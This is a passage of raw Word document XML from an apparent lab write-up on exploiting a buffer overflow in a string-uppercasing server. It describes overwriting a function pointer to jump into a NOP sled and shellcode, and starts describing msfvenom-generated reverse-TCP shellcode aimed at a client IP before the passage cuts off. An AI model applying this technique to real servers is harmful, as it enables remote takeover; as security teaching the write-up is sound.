                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2716290</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>178140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="153720" cy="215280"/>
                <wp:effectExtent l="57150" t="38100" r="36830" b="51435"/>
                <wp:wrapNone/>
                <wp:docPr id="20" name="Ink 20"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId51">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="153720" cy="215280"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="024A2DDF" id="Ink 20" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:213.2pt;margin-top:13.35pt;width:13.5pt;height:18.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">
                <v:imagedata r:id="rId52" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0040431C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A5D4462" wp14:editId="6F2D5168">
            <wp:extent cx="4853940" cy="657553"/>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1045" cy="666644"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E64215" w14:textId="727104B1" w:rsidR="0040431C" w:rsidRDefault="00485EAB" w:rsidP="002808A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74CDE884" wp14:editId="3FB08A8D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4224330</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-53465</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="546120" cy="271080"/>
                <wp:effectExtent l="57150" t="57150" r="44450" b="53340"/>
                <wp:wrapNone/>
                <wp:docPr id="21" name="Ink 21"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId54">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="546120" cy="271080"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="5CCB2945" id="Ink 21" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:331.9pt;margin-top:-4.9pt;width:44.4pt;height:2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">
                <v:imagedata r:id="rId55" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00853A5B">
        <w:t xml:space="preserve">If data (length of the string) received from the client is 4 bytes long (size of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00853A5B" w:rsidRPr="00254BEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s.nbytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00853A5B">
        <w:t xml:space="preserve">), the vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00D069F0">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00853A5B">
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidR="00D069F0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00853A5B">
        <w:t xml:space="preserve">triggered as shown below. Function pointer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00853A5B" w:rsidRPr="00254BEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s.fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00853A5B" w:rsidRPr="00254BEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D069F0">
        <w:t>is not</w:t>
      </w:r>
      <w:r w:rsidR="00853A5B">
        <w:t xml:space="preserve"> overwritten and the program execute</w:t>
      </w:r>
      <w:r w:rsidR="00D069F0">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00853A5B">
        <w:t xml:space="preserve"> normally. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A164D5" w14:textId="14365476" w:rsidR="0040431C" w:rsidRDefault="00C8715B" w:rsidP="002808A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5169CAE0" wp14:editId="1E473870">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5957570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1211580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="373410" cy="391795"/>
                <wp:effectExtent l="38100" t="38100" r="26670" b="46355"/>
                <wp:wrapNone/>
                <wp:docPr id="85" name="Ink 85"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId56">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="373410" cy="391795"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="75503F71" id="Ink 85" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:468.4pt;margin-top:94.7pt;width:30.8pt;height:3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">
                <v:imagedata r:id="rId57" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251709440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08877B39" wp14:editId="6527F035">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6160088</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>304171</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="130680" cy="80640"/>
                <wp:effectExtent l="38100" t="57150" r="41275" b="53340"/>
                <wp:wrapNone/>
                <wp:docPr id="76" name="Ink 76"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId58">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="130680" cy="80640"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="00460CD7" id="Ink 76" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:484.35pt;margin-top:23.25pt;width:11.75pt;height:7.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">
                <v:imagedata r:id="rId59" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251708416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1BA9C73D" wp14:editId="53E24C2D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6092048</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>305251</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="52920" cy="82800"/>
                <wp:effectExtent l="57150" t="57150" r="42545" b="50800"/>
                <wp:wrapNone/>
                <wp:docPr id="75" name="Ink 75"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId60">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="52920" cy="82800"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="27228386" id="Ink 75" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:479pt;margin-top:23.35pt;width:5.55pt;height:7.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">
                <v:imagedata r:id="rId61" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251707392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24C25D5C" wp14:editId="6BB57C3E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5982608</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>137131</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="101160" cy="262440"/>
                <wp:effectExtent l="38100" t="38100" r="51435" b="42545"/>
                <wp:wrapNone/>
                <wp:docPr id="74" name="Ink 74"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId62">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="101160" cy="262440"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4BC8D42E" id="Ink 74" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:470.35pt;margin-top:10.1pt;width:9.35pt;height:22.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">
                <v:imagedata r:id="rId63" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0040431C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2736D951" wp14:editId="0A0EA884">
            <wp:extent cx="5943600" cy="344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48685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C8837" w14:textId="6181494C" w:rsidR="00AD5BF4" w:rsidRDefault="00AD5BF4" w:rsidP="00AD5BF4">
      <w:r>
        <w:t xml:space="preserve">If the data received is longer than </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00536568">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00536568">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00536568">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s.nbytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00536568">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00254BEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s.fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will be overwritten. Then </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00254BEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s.fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00254BEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>can point to someplace in the data received and the program will be out of control of the server as shown below. Since a large part of the received data are NOP (</w:t>
      </w:r>
      <w:r w:rsidR="00341F41">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o operation but increasing the program counter) instructions, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00254BEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s.fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00254BEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">could be set to the address of any of the NOP instructions. Once </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00254BEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s.fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00254BEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">has been set to the address of one of the NOP instructions, the malicious payload (a segment of shellcode) </w:t>
      </w:r>
      <w:r w:rsidR="00C670EC">
        <w:t>may</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be executed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A27B53" w14:textId="77777777" w:rsidR="00AD5BF4" w:rsidRDefault="00AD5BF4" w:rsidP="00AD5BF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E824AF5" w14:textId="134BD460" w:rsidR="0040431C" w:rsidRDefault="0040431C" w:rsidP="002808A1"/>
    <w:p w14:paraId="5F1F31CD" w14:textId="5AF9FA96" w:rsidR="0040431C" w:rsidRDefault="00FA275C" w:rsidP="002808A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251706368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="194DED5E" wp14:editId="79DABEFE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5977890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1901825</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="375505" cy="331470"/>
                <wp:effectExtent l="38100" t="38100" r="43815" b="49530"/>
                <wp:wrapNone/>
                <wp:docPr id="61" name="Ink 61"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId65">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="375505" cy="331470"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1F2C98D6" id="Ink 61" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:470pt;margin-top:149.05pt;width:30.95pt;height:2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">
                <v:imagedata r:id="rId66" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="268A8E2C" wp14:editId="5226149E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6292928</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>242652</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="161640" cy="85680"/>
                <wp:effectExtent l="38100" t="38100" r="48260" b="48260"/>
                <wp:wrapNone/>
                <wp:docPr id="52" name="Ink 52"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId67">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="161640" cy="85680"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3018DEBC" id="Ink 52" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:494.8pt;margin-top:18.4pt;width:14.15pt;height:8.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">
                <v:imagedata r:id="rId68" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2BD73E24" wp14:editId="19810CC8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6145328</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>242292</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="101520" cy="98280"/>
                <wp:effectExtent l="38100" t="38100" r="51435" b="54610"/>
                <wp:wrapNone/>
                <wp:docPr id="51" name="Ink 51"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId69">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="101520" cy="98280"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="75D43F61" id="Ink 51" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:483.2pt;margin-top:18.4pt;width:9.45pt;height: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">
                <v:imagedata r:id="rId70" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="64E2321C" wp14:editId="244B9CFB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6063608</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>154092</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="47160" cy="194400"/>
                <wp:effectExtent l="57150" t="57150" r="48260" b="53340"/>
                <wp:wrapNone/>
                <wp:docPr id="50" name="Ink 50"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId71">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="47160" cy="194400"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0D13CFB2" id="Ink 50" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:476.75pt;margin-top:11.45pt;width:5.1pt;height:16.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">
                <v:imagedata r:id="rId72" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0040431C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F0EA36C" wp14:editId="4FA05AAC">
            <wp:extent cx="5915025" cy="3409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15025" cy="3409950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EC56AA" w14:textId="658803E2" w:rsidR="0040431C" w:rsidRDefault="0040431C" w:rsidP="002808A1"/>
    <w:p w14:paraId="3A79DB3D" w14:textId="77777777" w:rsidR="00AD5BF4" w:rsidRDefault="00AD5BF4" w:rsidP="00AD5BF4">
      <w:r>
        <w:t xml:space="preserve">4. Exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ADFE37" w14:textId="2B40953D" w:rsidR="00AD5BF4" w:rsidRDefault="00AD5BF4" w:rsidP="00AD5BF4">
      <w:r>
        <w:t xml:space="preserve"> The main idea of the exploit </w:t>
      </w:r>
      <w:r w:rsidR="00893942">
        <w:t>consist</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00893942">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> two parts. The first part is to prepare </w:t>
      </w:r>
      <w:r w:rsidRPr="00254BEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>a large</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00254BEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00893942">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:t>the string to be converted to uppercase) and send it to the server. This “string” now contains a large</w:t>
      </w:r>
      <w:r w:rsidR="00F673F4">
        <w:t xml:space="preserve"> number</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of NOP instructions and malicious shellcode. The second part is to overwrite </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00254BEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s.fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and change it to point to somewhere inside the NOP </w:t>
      </w:r>
      <w:r w:rsidR="00893942">
        <w:t>field</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FE2A31" w14:textId="77777777" w:rsidR="00AD5BF4" w:rsidRDefault="00AD5BF4" w:rsidP="00AD5BF4">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D4615" w14:textId="7A83CBAE" w:rsidR="00AD5BF4" w:rsidRDefault="00AD5BF4" w:rsidP="00AD5BF4">
      <w:r>
        <w:t xml:space="preserve">Using the </w:t>
      </w:r>
      <w:commentRangeStart w:id="3"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00893942">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:r w:rsidR="000E0425">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>fvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00893942">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool in Metasploit framework</w:t>
      </w:r>
      <w:commentRangeEnd w:id="3"/>
      <w:r w:rsidR="00470491">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="3"/>
      </w:r>
      <w:r w:rsidR="000E0425">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00346429">
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r w:rsidR="00346429" w:rsidRPr="00075CE3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.metasploit.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00346429">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="000E0425">
        <w:t xml:space="preserve">to generate </w:t>
      </w:r>
      <w:r>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidR="000E0425">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E0425">
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C217E">
        <w:t xml:space="preserve"> for local host</w:t>
      </w:r>
      <w:r w:rsidR="00346429">
        <w:t xml:space="preserve"> (client IP)</w:t>
      </w:r>
      <w:r w:rsidR="002C217E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006701AC">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>184.171.124.101</w:t>
      </w:r>
      <w:r w:rsidR="00346429">
